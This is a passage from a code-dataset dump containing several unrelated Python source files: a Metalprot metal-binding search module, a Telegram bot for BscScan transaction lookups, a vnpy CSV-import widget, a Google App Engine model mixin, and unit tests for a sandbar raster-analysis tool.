we need to extract vdM representations.\n        '''\n        print('neighbor_construct comb: {}'.format(win_comb))\n\n        comb_dict = dict()\n\n        for x, y in itertools.permutations(win_comb, 2):\n            if (x, y) not in self.neighbor_pair_dict.keys():\n                return comb_dict\n\n        graph = Graph(win_comb, len(self.vdms))\n\n        graph.calc_pair_connectivity(self.neighbor_pair_dict)\n\n        graph.get_paths()\n\n        print('graph.paths len {}'.format(len(graph.all_paths)))\n\n        # TODO: Temporary cap on extreme numbers of solutions, which mostly happens in 4-CYS binding cores.\n        if len(graph.all_paths) > 15000:\n            print('Too many paths to be considered so far.')\n            graph.all_paths = graph.all_paths[0:15001]\n\n        clu_dict = {}\n\n        # Each path holds the id of one metal vdM per win.\n        for path in graph.all_paths:\n\n            clu_key = tuple([self.vdms[p].get_cluster_key() for p in path])\n\n            if clu_key in clu_dict:\n                for i in range(len(win_comb)):\n                    clu_dict[clu_key][win_comb[i]].add(path[i])\n            else:\n                clu_dict[clu_key] = {}\n                for i in range(len(win_comb)):\n                    clu_dict[clu_key][win_comb[i]] = set()\n                    clu_dict[clu_key][win_comb[i]].add(path[i])\n\n        if len(clu_dict) > 0:\n            for clu_key in clu_dict.keys():\n                combinfo = CombInfo()\n                combinfo.comb = clu_dict[clu_key]\n                comb_dict[(tuple(win_comb), clu_key)] = combinfo\n\n        return comb_dict\n\n\n    def neighbor_construct_comb2(self, win_comb):\n        '''\n        win_comb: [0, 1, 2, 3]\n\n        cluster_dict: {(0, 0, 0, 0): {0:[1, 3, 4], 1:[2, 3, 4], 2: [2, 6, 7], 3:[1, 2, 3]}}\n        The key is the win; the value is a list of indices, each representing one metal coord that exists in all the other wins' metals.\n\n        self.neighbor_comb_dict\n        # { (wins, ids), (comb, combinfo)}\n        # {((0, 1, 2, 3)(0, 0, 0, 0)): {(0:[1, 3, 4], 1:[2, 3, 4], 2: [2, 6, 7], 3:[1, 2, 3]), combinfo}}\n\n\n        As we calculate all metals at the same time, we need to extract vdM representations.\n        '''\n        print('neighbor_construct comb: {}'.format(win_comb))\n\n        comb_dict = dict()\n\n        for x, y in itertools.permutations(win_comb, 2):\n            if (x, y) not in self.neighbor_pair_dict.keys():\n                return comb_dict\n\n        graph = Graph(win_comb, len(self.vdms))\n\n        graph.calc_pair_connectivity(self.neighbor_pair_dict)\n\n        graph.get_paths()\n\n        print('graph.paths len {}'.format(len(graph.all_paths)))\n\n        # TODO: Temporary cap on extreme numbers of solutions, which mostly happens in 4-CYS binding cores.\n        if len(graph.all_paths) > 15000:\n            print('Too many paths to be considered so far.')\n            graph.all_paths = graph.all_paths[0:15001]\n\n        # Each path holds the id of one metal vdM per win.\n        count = 0\n        for path in graph.all_paths:\n            clu_key = tuple([self.vdms[p].get_cluster_key() for p in path])\n\n            comb = dict()\n            for i in range(len(win_comb)):\n                comb[win_comb[i]] = [path[i]]\n\n            combinfo = CombInfo()\n            combinfo.comb = comb\n            comb_dict[(tuple(win_comb), clu_key, count)] = combinfo\n            count += 1\n\n        return comb_dict\n\n\n    def neighbor_write_win(self, comb_dict):\n        '''\n        Write output.\n        Produces a large number of files; may need optimization.
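\n\n        Example output layout (illustrative, assuming win_comb (3, 7) and cluster keys like ('HIS', 0)):\n            win_3-7/\n                win_3-7_clu_HIS-0-HIS-1_geometry.pdb\n                win_3-7_clu_HIS-0-HIS-1_centroid_<vdm_title>.pdb\n                win_3-7_clu_HIS-0-HIS-1_w_3_overlap_points.pdb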
\n '''\n print('neighbor_write')\n for key in comb_dict.keys(): \n info = comb_dict[key]\n if not self.search_filter.write_filtered_result and info.after_search_filtered:\n continue\n\n outpath = 'win_' + '-'.join([str(k) for k in key[0]]) + '/'\n outdir = self.workdir + outpath\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n tag = 'win_' + '-'.join([str(k) for k in key[0]]) + '_clu_' + '-'.join(k[0] + '-' + str(k[1]) for k in key[1]) \n\n # Write geometry \n pr.writePDB(outdir + tag +'_geometry.pdb', comb_dict[key].geometry) \n \n #Write Centroid and all metal coords in the cluster\n for w in key[0]:\n centroid = comb_dict[key].centroid_dict[w]\n pdb_path = outdir + tag + '_centroid_' + centroid.query.getTitle() + '.pdb'\n pr.writePDB(pdb_path, centroid.query)\n\n if self.output_wincomb_overlap:\n clu_allmetal_coords = centroid.get_metal_mem_coords()\n hull.write2pymol(clu_allmetal_coords, outdir, tag + '_w_' + str(w) +'_points.pdb') \n\n\n candidates = comb_dict[key].query_dict[w]\n metal_coords = []\n\n max_out = 100 #To reduce number of output.\n for c in candidates:\n if max_out >0:\n pdb_path = outdir + tag + '_w_' + str(w) + '_' + c.query.getTitle() + '.pdb'\n pr.writePDB(pdb_path, c.query) \n max_out-=1\n metal_coords.append(c.get_metal_coord())\n else:\n break\n\n hull.write2pymol(metal_coords, outdir, tag + '_w_' + str(w) +'_overlap_points.pdb')\n\n return \n\n\n def neighbor_write_represents(self):\n print('neighbor_write_represents')\n for key in self.neighbor_comb_dict.keys(): \n\n outdir = self.workdir + 'represents/'\n if not os.path.exists(outdir):\n os.mkdir(outdir) \n\n tag = 'win_' + '-'.join([str(k) for k in key[0]]) + '_clu_' + '-'.join(k[0] + '-' + str(k[1]) for k in key[1]) \n for w in key[0]:\n c = self.neighbor_comb_dict[key].query_dict[w][0]\n pdb_path = outdir + tag + '_w_' + str(w) + '_apble_' + c.abple + '_' + c.query.getTitle() + '.pdb'\n pr.writePDB(pdb_path, c.query) \n\n return\n\n","repo_name":"lonelu/Metalprot","sub_path":"metalprot/search/search_category.py","file_name":"search_category.py","file_ext":"py","file_size_in_byte":16082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72792734872","text":"import os\n\nfrom telegram import Update, ForceReply\nfrom telegram.ext import CommandHandler, CallbackContext, ApplicationBuilder, ConversationHandler, filters, \\\n MessageHandler\n\nfrom dotenv import load_dotenv\n\nfrom api_hendler import DataParser\n\nload_dotenv()\n\nWAITING_FOR_ADDRESS: str = ''\n\n\nclass BscScanBot:\n def __init__(self):\n self.application = ApplicationBuilder().token(os.environ.get(\"TELE_TOKEN\")).build()\n self.setup_handlers()\n\n async def start(self, update: Update, context: CallbackContext) -> str:\n await update.message.reply_text('Hello! 
I am here to show you your transaction history on \"BscScan\".')\n await update.message.reply_text(\n 'Enter the address.',\n reply_markup=ForceReply(selective=False)\n )\n return WAITING_FOR_ADDRESS\n\n async def get_address(self, update: Update, context: CallbackContext):\n address = update.message.text\n if not address.startswith(\"0x\") or not address:\n await update.message.reply_text(\"Incorrect address, the bot has stopped, please press /start again\")\n return ConversationHandler.END\n data = DataParser(address)\n result = data.get_info()\n if isinstance(result, str):\n await update.message.reply_text(f\"{result}\")\n return ConversationHandler.END\n await self.send_large_list(update.message.chat_id, result, context.bot)\n return ConversationHandler.END\n\n @staticmethod\n async def send_large_list(chat_id, large_list, tele_bot):\n chunk_size = 5\n for i in range(0, len(large_list), chunk_size):\n chunk = large_list[i:i + chunk_size]\n message_text = '\\n'.join(str(item) + \"\\n\" for item in chunk)\n await tele_bot.send_message(chat_id=chat_id, text=message_text)\n\n def setup_handlers(self):\n conv_handler = ConversationHandler(\n entry_points=[CommandHandler('start', self.start)],\n states={\n WAITING_FOR_ADDRESS: [MessageHandler(filters.TEXT & (~filters.COMMAND), self.get_address)],\n },\n fallbacks=[]\n )\n self.application.add_handler(conv_handler)\n\n def run(self):\n self.application.run_polling()\n\n\nif __name__ == '__main__':\n bot = BscScanBot()\n bot.run()\n","repo_name":"Stepbus/demo_teleBot_bscscan_project","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17144304738","text":"\"\"\"\nAuthor: Zehua Wei (nanoric)\n\"\"\"\n\nfrom vnpy.event import EventEngine\nfrom vnpy.trader.constant import Exchange, Interval\nfrom vnpy.trader.engine import MainEngine\nfrom vnpy.trader.ui import QtCore, QtWidgets\n\nfrom ..engine import APP_NAME\n\n\nclass CsvLoaderWidget(QtWidgets.QWidget):\n \"\"\"\"\"\"\n\n def __init__(self, main_engine: MainEngine, event_engine: EventEngine):\n \"\"\"\"\"\"\n super().__init__()\n\n self.engine = main_engine.get_engine(APP_NAME)\n\n self.init_ui()\n\n def init_ui(self):\n \"\"\"\"\"\"\n self.setWindowTitle(\"CSV载入\")\n self.setFixedWidth(300)\n\n self.setWindowFlags(\n (self.windowFlags() | QtCore.Qt.CustomizeWindowHint)\n & ~QtCore.Qt.WindowMaximizeButtonHint)\n\n file_button = QtWidgets.QPushButton(\"选择文件\")\n file_button.clicked.connect(self.select_file)\n\n load_button = QtWidgets.QPushButton(\"载入数据\")\n load_button.clicked.connect(self.load_data)\n\n self.file_edit = QtWidgets.QLineEdit()\n self.symbol_edit = QtWidgets.QLineEdit()\n\n self.exchange_combo = QtWidgets.QComboBox()\n for i in Exchange:\n self.exchange_combo.addItem(str(i.name), i)\n\n self.interval_combo = QtWidgets.QComboBox()\n for i in Interval:\n self.interval_combo.addItem(str(i.name), i)\n\n self.datetime_edit = QtWidgets.QLineEdit(\"Datetime\")\n self.open_edit = QtWidgets.QLineEdit(\"Open\")\n self.high_edit = QtWidgets.QLineEdit(\"High\")\n self.low_edit = QtWidgets.QLineEdit(\"Low\")\n self.close_edit = QtWidgets.QLineEdit(\"Close\")\n self.volume_edit = QtWidgets.QLineEdit(\"Volume\")\n\n self.format_edit = QtWidgets.QLineEdit(\"%Y-%m-%d %H:%M:%S\")\n\n info_label = QtWidgets.QLabel(\"合约信息\")\n info_label.setAlignment(QtCore.Qt.AlignCenter)\n\n head_label = QtWidgets.QLabel(\"表头信息\")\n 
head_label.setAlignment(QtCore.Qt.AlignCenter)\n\n format_label = QtWidgets.QLabel(\"格式信息\")\n format_label.setAlignment(QtCore.Qt.AlignCenter)\n\n form = QtWidgets.QFormLayout()\n form.addRow(file_button, self.file_edit)\n form.addRow(QtWidgets.QLabel())\n form.addRow(info_label)\n form.addRow(\"代码\", self.symbol_edit)\n form.addRow(\"交易所\", self.exchange_combo)\n form.addRow(\"周期\", self.interval_combo)\n form.addRow(QtWidgets.QLabel())\n form.addRow(head_label)\n form.addRow(\"时间戳\", self.datetime_edit)\n form.addRow(\"开盘价\", self.open_edit)\n form.addRow(\"最高价\", self.high_edit)\n form.addRow(\"最低价\", self.low_edit)\n form.addRow(\"收盘价\", self.close_edit)\n form.addRow(\"成交量\", self.volume_edit)\n form.addRow(QtWidgets.QLabel())\n form.addRow(format_label)\n form.addRow(\"时间格式\", self.format_edit)\n form.addRow(QtWidgets.QLabel())\n form.addRow(load_button)\n\n self.setLayout(form)\n\n def select_file(self):\n \"\"\"\"\"\"\n result: str = QtWidgets.QFileDialog.getOpenFileName(self)\n filename = result[0]\n if filename:\n self.file_edit.setText(filename)\n\n def load_data(self):\n \"\"\"\"\"\"\n file_path = self.file_edit.text()\n symbol = self.symbol_edit.text()\n exchange = self.exchange_combo.currentData()\n interval = self.interval_combo.currentData()\n datetime_head = self.datetime_edit.text()\n open_head = self.open_edit.text()\n low_head = self.low_edit.text()\n high_head = self.high_edit.text()\n close_head = self.close_edit.text()\n volume_head = self.volume_edit.text()\n datetime_format = self.format_edit.text()\n\n start, end, count = self.engine.load(\n file_path,\n symbol,\n exchange,\n interval,\n datetime_head,\n open_head,\n high_head,\n low_head,\n close_head,\n volume_head,\n datetime_format\n )\n\n msg = f\"\\\n CSV载入成功\\n\\\n 代码:{symbol}\\n\\\n 交易所:{exchange.value}\\n\\\n 周期:{interval.value}\\n\\\n 起始:{start}\\n\\\n 结束:{end}\\n\\\n 总数量:{count}\\n\\\n \"\n QtWidgets.QMessageBox.information(self, \"载入成功!\", msg)\n","repo_name":"GladosAI/VN-CTP","sub_path":"vnpy/app/csv_loader/ui/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"5"} +{"seq_id":"1857376367","text":"from google.appengine.ext import db\n\n\nclass ModelMixin(object):\n \"\"\"\n Base class used to create mix-in classes for L{db.Model} classes.\n \"\"\"\n\n __metaclass__ = db.PropertiedClass\n\n @classmethod\n def kind(self):\n \"\"\"\n Need to implement this because it is called by PropertiedClass\n to register the kind name in _kind_map. We just return a dummy name.\n \"\"\"\n return '__model_mixin__'\n\n\nclass Timestamped(ModelMixin):\n create_date = db.DateTimeProperty(auto_now_add=True, indexed=True)\n modified_date = db.DateTimeProperty(auto_now=True, indexed=False)\n","repo_name":"computmaxer/boxtrackr","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37077503233","text":"\"\"\"\n\n Sandbar Analysis Unit Testing\n\n How to use in pyCharm:\n 1. preferncecs => Tools => Python Integrated Tools => Default Test Runner => Unittest\n 2. Create a new run configuration using the run configuration dropdown in the top\n left. use the \"+\" button to choose Python Tests => Unittest\n Just se the default options\n 3. 
Now you can run Unittests in sandbar-analysis\n\n\"\"\"\n\n# Utility functions we need\nimport unittest\nimport numpy as np\nimport gdal, shutil\nfrom os import path, makedirs\n\n# Here's what we're testing\nimport RasterAnalysis\nfrom logger import Logger\nfrom Raster import Raster, deleteRaster\nfrom CSVLib import unionCSVExtents\nfrom SandbarSite import SandbarSite\n\nclass TempPathHelper():\n def __init__(self):\n \"\"\"\n Create for us a tmp Path\n :return: the path to the tmp folder\n \"\"\"\n cwd = path.dirname(path.abspath(__file__))\n self.path = path.join(cwd, 'TMP')\n if path.isdir(self.path):\n self.destroy()\n makedirs(self.path)\n\n def destroy(self):\n \"\"\"\n Clean up our tmp folder\n :return:\n \"\"\"\n if self.path is not None and path.isdir(self.path):\n shutil.rmtree(self.path)\n\nclass TestLoggerSingletonClass(unittest.TestCase):\n\n def test_singleton(self):\n \"\"\"\n Test the singleton. If it's not the same object nothing else matters\n \"\"\"\n log1 = Logger(\"testMessages\")\n log2 = Logger(\"Other things\")\n self.assertIs(log1.instance.instance, log2.instance.instance)\n\n def test_messages(self):\n \"\"\"\n Test all the basic message types\n \"\"\"\n log = Logger('TestMessages')\n log.setup(logRoot='test',\n xmlFilePath='TestMessages.xml',\n verbose=False,\n config={})\n log.info(\"Info Message\")\n log.warning(\"Warning Message\")\n log.error(\"Error Message\")\n log.error(\"Error Message with exception\", Exception(\"thing is an exception\"))\n log.destroy()\n self.assertTrue(True)\n\n def test_MultipleLoggers(self):\n log1 = Logger(\"Method1\")\n log2 = Logger(\"Method2\")\n log1.setup(logRoot='test',\n xmlFilePath='TestMultipleLoggers.xml',\n verbose=False,\n config={})\n\n log1.info('TestMessages from log1')\n log2.info('TestMessages from log2')\n\n log1.destroy()\n log2.destroy()\n self.assertTrue(True)\n\n def test_DebugFlag(self):\n log = Logger('TestMessages With Verbose')\n log.setup(logRoot='test',\n xmlFilePath='TestDebugFlagFalse.xml',\n verbose=False,\n config={})\n log.info(\"This message should appear on its own\")\n log.debug(\"This message should not appear\")\n\n log.setup(logRoot='test',\n xmlFilePath='TestDebugFlagTrue.xml',\n verbose=True,\n config={})\n log.info(\"This message should appear and one below it\")\n log.debug(\"This message should also appear\")\n log.destroy()\n self.assertTrue(True)\n\n def test_DebugMultiObj(self):\n log = Logger('TestDebugMultiObj')\n log.setup(logRoot='test',\n xmlFilePath='TestDebugMultiObj.xml',\n verbose=True,\n config={})\n log.debug(\"Some things:\", {\"thing1\": \"thing1Val\"}, [0,1,2,3,4,5], 2232.343)\n log.destroy()\n self.assertTrue(True)\n\nclass TestRasterClass(unittest.TestCase):\n \"\"\"\n Before we do anything we need to test that the mechanism\n we use to verify tests is ok.\n \"\"\"\n def test_Write(self):\n tmp = TempPathHelper()\n filename1 = path.join(tmp.path, 'raster1.tif')\n filename2 = path.join(tmp.path, 'raster1-neg-cell-height.tif')\n ndVal = -9999.0\n dataType = gdal.GDT_Float32\n extent = (0,0.4,0,0.3)\n proj = \"\"\n # Input Array. 
here we test lots of different kinds of values\n inRas = np.ma.masked_array( [\n [ 0.0, 1, 2, 3 ],\n [ ndVal, np.nan, np.nan, 3 ],\n [ 100, 200.0, 300, 500000.0 ] ],\n mask = np.array([\n [0,0,1,0],\n [0,0,0,0],\n [0,0,0,0]] ) )\n\n # And here's what we expect to get back when we read the file back in:\n # NB: Note different mask and values\n raOut = np.ma.masked_array( [\n [ 0.0, 1.0, ndVal, 3.0 ],\n [ ndVal, ndVal, ndVal, 3.0 ],\n [ 100, 200.0, 300.0, 500000.0 ] ],\n mask = np.array([\n [0,0,1,0],\n [1,1,1,0],\n [0,0,0,0]\n ]) )\n\n rIn = Raster(array=inRas, extent=extent, cellWidth=0.1, cellHeight=0.1, nodata=ndVal, proj=proj)\n rIn.write(filename1)\n\n # Now load it into another raster object and compare the two\n rOut = Raster(filepath=filename1)\n # rOut.PrintRawArray()\n # rOut.PrintArray()\n # rOut.ASCIIPrint()\n # The input array equals the output array\n self.assertTrue((rIn.array == rOut.array).all())\n # The output array is what we expect\n self.assertTrue((rIn.array == raOut).all())\n self.assertTrue(rOut.nodata == ndVal)\n self.assertTrue(rOut.proj == proj)\n self.assertTrue(rOut.top == extent[2])\n self.assertTrue(rOut.left == extent[0])\n self.assertTrue(rOut.dataType == dataType)\n\n # Try again, this time with negative cell height\n rIn2 = Raster(array=np.flipud(inRas), extent=extent, cellWidth=0.1, cellHeight=-0.1, nodata=ndVal, proj=proj)\n rIn2.write(filename2)\n\n # Now load it into another raster object and compare the two\n rOut2 = Raster(filepath=filename2)\n # rOut2.PrintRawArray()\n # rOut2.PrintArray()\n # rOut2.ASCIIPrint()\n self.assertTrue(rOut2.nodata == ndVal)\n self.assertTrue(rOut2.proj == proj)\n self.assertTrue(rOut2.top == extent[3]) # Top is now different\n self.assertTrue(rOut2.left == extent[0])\n self.assertTrue(rOut2.dataType == dataType)\n\n # The input array equals the output array\n self.assertTrue((rIn2.array == rOut2.array).all())\n # The output array is what we expect\n self.assertTrue((rIn2.array == np.flipud(raOut)).all())\n\n\n # Clean up any files created\n deleteRaster(filename1)\n deleteRaster(filename2)\n tmp.destroy()\n\n def test_SetArray(self):\n cellSize = 1\n theExtent = (0, 3, 10, 12)\n maskedArray = np.ma.masked_array([\n [924.846, 926.17, 901.45, 942.184],\n [904.828, 912.693, np.nan, np.nan],\n [937.801, 928.423, 941.453, 912.141]],\n mask=np.array([\n [0, 0, 0, 0],\n [0, 0, 1, 1],\n [0, 0, 0, 0]]))\n\n unmaskedArray = np.array([\n [924.846, 926.17, 901.45, 942.184],\n [904.828, 912.693, np.nan, np.nan],\n [937.801, 928.423, 941.453, 912.141]])\n\n rTestMasked1 = Raster(extent=theExtent, cellWidth=cellSize, rows=3, cols=4)\n rTestMasked1.setArray(maskedArray)\n rTestMasked2 = Raster(array=maskedArray, extent=theExtent, cellWidth=cellSize, rows=3, cols=4)\n\n rTestNoMask1 = Raster(extent=theExtent, cellWidth=cellSize, rows=3, cols=4)\n rTestNoMask1.setArray(maskedArray)\n rTestNoMask2 = Raster(array=maskedArray, extent=theExtent, cellWidth=cellSize, rows=3, cols=4)\n\n print((rTestMasked1.array))\n print((rTestMasked2.array))\n print((rTestNoMask1.array))\n print((rTestNoMask2.array))\n\n # Compare direct Array setting to setting it later for MASKED input array\n self.assertTrue((rTestMasked1.array == rTestMasked2.array).all())\n self.assertTrue((rTestMasked1.array.mask == rTestMasked2.array.mask).all())\n\n # Compare direct Array setting to setting it later for UNMASKED input array\n self.assertTrue((rTestNoMask1.array == rTestNoMask2.array).all())\n self.assertTrue((rTestNoMask1.array.mask == 
rTestNoMask2.array.mask).all())\n\n # Compare masked to unmasked\n self.assertTrue((rTestMasked1.array == rTestNoMask1.array).all())\n self.assertTrue((rTestMasked1.array.mask == rTestNoMask1.array.mask).all())\n\n # Compare masked to unmasked\n self.assertTrue((rTestMasked2.array == rTestNoMask2.array).all())\n self.assertTrue((rTestMasked2.array.mask == rTestNoMask2.array.mask).all())\n\n def test_loadDEMFromCSV(self):\n tmp = TempPathHelper()\n filename = path.join(tmp.path, 'raster1.tif')\n cellSize = 1.0\n padding = 0\n gridPath = path.join(path.dirname(path.abspath(__file__)), 'test', 'assets', 'grids', 'grid1.txt')\n theExtent = unionCSVExtents([gridPath], padding=padding, cellSize=cellSize)\n rTest = Raster(extent=theExtent, cellWidth=cellSize)\n\n # Here's what we're testing:\n rTest.loadDEMFromCSV(gridPath, theExtent, Raster.PointShift.CENTER)\n\n testArray = np.ma.masked_array([\n [924.846, 926.17, 901.45, 942.184],\n [904.828, 912.693, np.nan, np.nan],\n [937.801, 928.423, 941.453, 912.141]],\n mask=np.array([\n [0, 0, 0, 0],\n [0, 0, 1, 1],\n [0, 0, 0, 0]]))\n\n # If the extent is wrong then this test is invalid\n self.assertTupleEqual(theExtent, (-0.5, 3.5, 9.5, 12.5))\n self.assertEqual(theExtent[0], rTest.left)\n self.assertEqual(theExtent[3], rTest.top)\n\n # Now the real test begins\n self.assertEqual(rTest.cellHeight, -cellSize)\n self.assertEqual(rTest.cellWidth, cellSize)\n self.assertEqual(rTest.rows, 3)\n self.assertEqual(rTest.cols, 4)\n self.assertEqual(rTest.left, -0.5)\n self.assertEqual(rTest.top, 12.5)\n self.assertEqual(rTest.array.shape, (3, 4))\n self.assertTrue((rTest.array == testArray).all())\n rTest.write(filename)\n deleteRaster(filename)\n tmp.destroy()\n\n\n def test_MergeMinSurface(self):\n cellSize = 1\n gridPath1 = path.join(path.dirname(path.abspath(__file__)), 'test', 'assets', 'grids', 'grid1.txt')\n gridPath2 = path.join(path.dirname(path.abspath(__file__)), 'test', 'assets', 'grids', 'grid2.txt')\n\n theExtent = unionCSVExtents([gridPath1,gridPath2], padding=0)\n # Create our two grids from CSV files that we can add into the min surface\n rTest1 = Raster(extent=theExtent, cellWidth=cellSize)\n rTest1.loadDEMFromCSV(gridPath1, theExtent, ptCenter=Raster.PointShift.CENTER)\n rTest2 = Raster(extent=theExtent, cellWidth=cellSize)\n rTest2.loadDEMFromCSV(gridPath2, theExtent, ptCenter=Raster.PointShift.CENTER)\n\n # Now let's create a min surface we can use to test things\n rMinSrf = Raster(extent=theExtent, cellWidth=cellSize)\n rMinSrf.setArray(np.nan * np.empty((rTest1.rows, rTest1.cols)))\n\n rMinSrf.MergeMinSurface(rTest1)\n testArray = np.ma.masked_array([\n [924.846, 926.17, 901.45, 942.184],\n [904.828, 912.693, np.nan, np.nan],\n [937.801, 928.423, 941.453, 912.141]],\n mask=np.array([\n [0, 0, 0, 0],\n [0, 0, 1, 1],\n [0, 0, 0, 0]]))\n self.assertTrue((rMinSrf.array == testArray).all())\n\n rMinSrf.MergeMinSurface(rTest2)\n testArray2 = np.ma.masked_array([\n [911.511, 922.517, 901.45, 923.232],\n [904.828, 911.819, 907.663, 931.264],\n [919.413, 920.007, 941.453, 912.141]],\n mask=np.array([\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0]]))\n self.assertTrue((rMinSrf.array == testArray2).all())\n\n\n def test_ResampleDEM(self):\n cellSize = 1\n ndVal = -9999.0\n theExtent = (0, 3, 10, 12)\n theTestArray = np.ma.masked_array([\n [0.0, 1, 2, 3],\n [ndVal, np.nan, 6, 3],\n [100, 200.0, 300, 500000.0]],\n mask=np.array([\n [0, 0, 1, 0],\n [1, 1, 0, 0],\n [0, 0, 0, 0]]))\n\n rTest1 = Raster(array=theTestArray, extent=theExtent, 
cellWidth=cellSize)\n rTest1.PrintArray()\n rTest1.ASCIIPrint()\n rLinear = rTest1.ResampleDEM(0.5, 'linear')\n rLinear.PrintArray()\n rLinear.ASCIIPrint()\n\n rBilinear = rTest1.ResampleDEM(0.5, 'bilinear')\n rBilinear.PrintArray()\n\n rCubic = rTest1.ResampleDEM(0.5, 'cubic')\n rCubic.PrintArray()\n rCubic.ASCIIPrint()\n\n rNearest = rTest1.ResampleDEM(0.5, 'nearest')\n rNearest.PrintArray()\n rNearest.ASCIIPrint()\n\n # We have no test for this so it should always fail\n self.assertTrue(False)\n\n def test_ResampleCSVDEM(self):\n tmp = TempPathHelper()\n padding = 5\n\n cellSize = 1\n gridPath1 = path.join(path.dirname(path.abspath(__file__)), 'test', 'assets', 'grids', 'realgrid.txt')\n theExtent = unionCSVExtents([gridPath1], padding=padding)\n # Create our grid from CSV file that we can add into the min surface\n rTest1 = Raster(extent=theExtent, cellWidth=cellSize)\n rTest1.loadDEMFromCSV(gridPath1, theExtent, ptCenter=Raster.PointShift.CENTER)\n rTest1filename = path.join(tmp.path, 'realgrid.tif')\n rTest1.write(rTest1filename)\n\n rLinear = rTest1.ResampleDEM(0.5, 'linear')\n rLinearFilename = path.join(tmp.path, 'realgridLinear.tif')\n rLinear.write(rLinearFilename)\n\n rBilinear = rTest1.ResampleDEM(0.5, 'bilinear')\n rBilinearFilename = path.join(tmp.path, 'realgridBilinear.tif')\n rBilinear.write(rBilinearFilename)\n\n rCubic = rTest1.ResampleDEM(0.5, 'cubic')\n rCubicfilename = path.join(tmp.path, 'realgridCubic.tif')\n rCubic.write(rCubicfilename)\n\n rNearest = rTest1.ResampleDEM(0.5, 'nearest')\n rNearestFilename = path.join(tmp.path, 'realgridNearest.tif')\n rNearest.write(rNearestFilename)\n\n deleteRaster(rTest1filename)\n deleteRaster(rLinearFilename)\n deleteRaster(rBilinearFilename)\n deleteRaster(rCubicfilename)\n deleteRaster(rNearestFilename)\n tmp.destroy()\n\n # We have no test for this so it should always fail\n self.assertTrue(False)\n\nclass TestSandbarSite(unittest.TestCase):\n \"\"\"\n Testing raster creation from CSV\n All these methods have been done by hand first. Compare to this:\n https://docs.google.com/spreadsheets/d/1fimx0WABf2cm7fhs_EUithfgGOwky5tTX2_IRf9M1aI/edit#gid=0\n \"\"\"\n def test_getRasterTXTUnionExtent(self):\n padding = 10\n cellsize = 1.0\n tmp = TempPathHelper()\n currdir = path.dirname(path.abspath(__file__))\n gridPath1 = path.join(currdir, 'test', 'assets', 'grids', 'grid1.txt')\n gridPath2 = path.join(currdir, 'test', 'assets', 'grids', 'grid2.txt')\n gridPath3 = path.join(currdir, 'test', 'assets', 'grids', 'grid3.txt')\n\n theExtent = unionCSVExtents([gridPath1, gridPath2, gridPath3], padding=10)\n self.assertTupleEqual(theExtent, (-10.5, 14.5, -0.5, 23.5))\n\nclass TestAreaVolume(unittest.TestCase):\n \"\"\"\n Refer to this spreadsheet: https://docs.google.com/spreadsheets/d/1MmjVkg4lg50rC0n6xYBTeor0T3_QPLQRaEYFmBnB5OA/edit#gid=0\n\n NOTE: THE FOLLOWING ASSUMES THRESHOLDING ASSUMES BOTH \">\" AND \"<\" (AS OPPOSED TO \"<=\" AND/OR \">=\")\n \"\"\"\n def setUp(self):\n # Input Array. 
here we test lots of different kinds of values\n self.ndVal = -9999.0\n self.cellSize = 0.1\n\n self.arSurf = np.ma.masked_array( [\n [ 10.0, 12, self.ndVal, 13 ],\n [ np.nan, 18, 24.0, 3 ],\n [ 100, 3.0, 30.0, 20.0 ] ],\n mask = np.array([\n [0,0,1,0],\n [1,0,0,0],\n [0,0,0,0]] ) )\n\n # Set the minimum surface up with some values\n self.arMin = np.ma.masked_array([\n [10, 0.5, 0.1, 0.002],\n [self.ndVal, 15, 0.1, 0.003],\n [0.0, 0.5, 20, 0.004]],\n mask=np.array([\n [0, 0, 1, 0],\n [1, 0, 0, 0],\n [0, 1, 0, 0]]))\n\n def test_LowZeroNoHigh(self):\n \"\"\"\n Test when low threshold is 0 and there is no high threshold\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 0, None , self.cellSize, \"\")\n self.assertAlmostEqual(test[0],0.08, places=7)\n self.assertAlmostEqual(test[1],1.8439, places=7)\n\n def test_LowNoHigh(self):\n \"\"\"\n Test when low threshold is 1 and there is no high threshold\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 10, None , self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.07, places=7)\n self.assertAlmostEqual(test[1], 1.32, places=7)\n\n def test_HighNoLow(self):\n \"\"\"\n Test when there is a high threshold but no low threshold\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, None, 20, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.04, places=7)\n self.assertAlmostEqual(test[1], 0.305, places=7)\n\n def test_LowAndHigh(self):\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 10, 20, self.cellSize, \"\")\n self.assertAlmostEqual(test[0],0.03, places=7)\n self.assertAlmostEqual(test[1], 0.08, places=7)\n\n def test_MinEqualSurface(self):\n \"\"\"\n Test when the minimum surface is equal to the surface being tested\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arMin, self.arMin, 0, None, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.08, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arMin, self.arMin, 10, None, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.02, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arMin, self.arMin, None, 20, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.08, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arMin, self.arMin, 10, 20, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.01, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n\n def test_HighThresholds(self):\n \"\"\"\n Test when the 